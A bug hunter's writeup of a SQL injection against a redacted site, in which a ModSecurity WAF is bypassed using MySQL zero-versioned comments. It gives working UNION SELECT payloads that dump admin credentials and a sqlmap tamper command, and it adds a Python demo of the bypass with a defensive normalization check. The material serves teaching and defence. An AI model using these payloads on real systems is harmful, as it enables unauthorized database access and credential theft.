SQL Injection — WAF Bypass!

After getting a lot of DMs asking how I bypassed the WAF in my previous writeup, I decided to write this one. "Knowledge is free." Without further delay, let's start.

I assume you already know what SQL injection is and its main types. In this writeup I'll show how I bypassed the ModSecurity WAF and got full access to the database.

I put a single quote after the numeric id parameter and got an error: some elements of the page disappeared. That made me confident SQL injection was possible.

I'm skipping the basic part, finding the number of columns in the vulnerable query (e.g. ORDER BY n until it errors, or a UNION SELECT with a growing value list). There were 10 columns, so every UNION SELECT below has to supply exactly 10 values or MySQL rejects it. Two details make the payloads work: id=-3 makes the original SELECT return no row, so the row produced by the UNION is what gets rendered, and the keywords are wrapped in MySQL version-conditional comments. MySQL executes the text inside /*!NNNNN ... */ only when its server version is at least NNNNN, and 00000 matches every version, so the server sees a plain "union select" while a WAF rule that looks for the bare keyword pair sees only a comment. From Query 2 on, the sixth column carries the output, since that is the one reflected in the page.

Query 1: https://redacted.com/xx/leads_details.php?id=-3 /*!00000union select*/ 1,2,3,4,5,6,7,8,9,10 -- +

Query 2: https://redacted.com/xx/leads_details.php?id=-3 /*!00000union select*/ 1,2,3,4,5,database(),7,8,9,10 -- +

Query 3: https://redacted.com/xx/leads_details.php?id=-3 /*!00000union select*/ 1,2,3,4,5,group_concat(table_name),7,8,9,10 from /*!00000information_schema.tables*/ /*!00000where*/ /*!00000table_schema*/=database() -- +

Query 4: https://redacted.com/xx/leads_details.php?id=-3 /*!00000union select*/ 1,2,3,4,5,group_concat(column_name),7,8,9,10 from /*!00000information_schema.columns*/ /*!00000where*/ /*!00000table_name*/='admin' -- +

Query 5: https://redacted.com/xx/leads_details.php?id=-3 /*!00000union select*/ 1,2,3,4,5,group_concat(Username,0x0a,password,0x0a,name),7,8,9,10 from admin -- +

The username was admin and the name was dev (0x0a is a newline, so each field landed on its own line). The password was stored as a hash; I identified it as MD5 and cracked it. It was derived from the admin's name: "dev456". An unsalted MD5 of a short, guessable string like that falls to a wordlist in seconds.

That was the manual method. You can automate it with sqlmap (sqlmap -u "https://site.com/details.php?id=1" --dbs --banner --tamper=modsecurityzeroversioned); the randomcase tamper script can be chained with it too, as --tamper=modsecurityzeroversioned,randomcase.
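To show why the zero-versioned comment slips past a keyword rule, and what a WAF has to do to catch it, here is an added Python example. It is not from the original writeup and is not ModSecurity's or sqlmap's code. It assumes a deliberately naive rule, union\s+select, standing in for whatever rule the real WAF applied, and includes a hypothetical zero_version_wrap helper that builds the bypass form the way the queries above do (and the way sqlmap's modsecurityzeroversioned tamper does in spirit). The payload strings are constructed from the queries in this writeup, not captured traffic.

```python
import re

# Constructed payloads: the plain textbook form and the zero-versioned form used in Query 1.
PLAIN_PAYLOAD = "-3 union select 1,2,3,4,5,6,7,8,9,10 -- +"
BYPASS_PAYLOAD = "-3 /*!00000union select*/ 1,2,3,4,5,6,7,8,9,10 -- +"

# Constructed from Query 3 above (column count fixed to 10).
QUERY3_PAYLOAD = (
    "-3 /*!00000union select*/ 1,2,3,4,5,group_concat(table_name),7,8,9,10 "
    "from /*!00000information_schema.tables*/ /*!00000where*/ "
    "/*!00000table_schema*/=database() -- +"
)

# Assumed naive WAF rule: the two keywords separated only by whitespace.
# Note that \b does not match between "0" and "u" (both are word characters),
# so "/*!00000union select*/" is invisible to it.
NAIVE_RULE = re.compile(r"\bunion\s+select\b", re.IGNORECASE)

# MySQL comment syntax: /*!NNNNN text*/ is a version-conditional comment whose
# text is executed when the server version is >= NNNNN (00000 always qualifies);
# an ordinary /* text */ comment is discarded.
VERSIONED_COMMENT = re.compile(r"/\*!(\d{5})?(.*?)\*/", re.DOTALL)
PLAIN_COMMENT = re.compile(r"/\*.*?\*/", re.DOTALL)


def naive_waf_blocks(param: str) -> bool:
    """Verdict of the naive rule applied to the raw request parameter."""
    return bool(NAIVE_RULE.search(param))


def mysql_view(param: str, server_version: int = 80000) -> str:
    """Approximate the text the MySQL parser actually sees after comment handling."""
    def keep_or_drop(m):
        required = int(m.group(1)) if m.group(1) else 0
        return m.group(2) if server_version >= required else ""
    without_versioned = VERSIONED_COMMENT.sub(keep_or_drop, param)
    return PLAIN_COMMENT.sub("", without_versioned)


def normalized_waf_blocks(param: str, server_version: int = 80000) -> bool:
    """Same rule, but run on the parser's view of the input instead of the raw bytes."""
    return naive_waf_blocks(mysql_view(param, server_version))


# Hypothetical helper: wrap each listed keyword in a zero-versioned comment,
# turning the plain payload into the bypass form. Not sqlmap's implementation.
DEFAULT_KEYWORDS = ("union select", "information_schema.tables", "where", "table_schema")


def zero_version_wrap(sql: str, keywords=DEFAULT_KEYWORDS) -> str:
    out = sql
    for kw in keywords:
        pattern = r"\b" + re.escape(kw) + r"\b"
        out = re.sub(pattern, lambda m: f"/*!00000{m.group(0)}*/", out, flags=re.IGNORECASE)
    return out


if __name__ == "__main__":
    for label, p in (("plain", PLAIN_PAYLOAD), ("bypass", BYPASS_PAYLOAD), ("query3", QUERY3_PAYLOAD)):
        print(f"{label:7s} raw-rule blocks: {naive_waf_blocks(p)!s:5s} "
              f"normalized-rule blocks: {normalized_waf_blocks(p)}")
        print(f"        server sees: {mysql_view(p)}")
```

The check a defender wants is normalized_waf_blocks: strip or unwrap the comment syntax the backend parser will strip before the signature is applied, so the rule and the database agree on what the query says. Two caveats: the trailing "-- +" only works because the "+" decodes to a space, which MySQL's "-- " line comment requires; and current ModSecurity Core Rule Set releases flag the "/*!" sequence itself, so a bypass like this one points to an old or loosened ruleset rather than a weakness in the engine.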

That's it, folks! I hope you liked this. "Keep hunting, keep sharing!"

Instagram: th3.d1p4k

Twitter: Dipak Panchal

Bug hunter | CCSE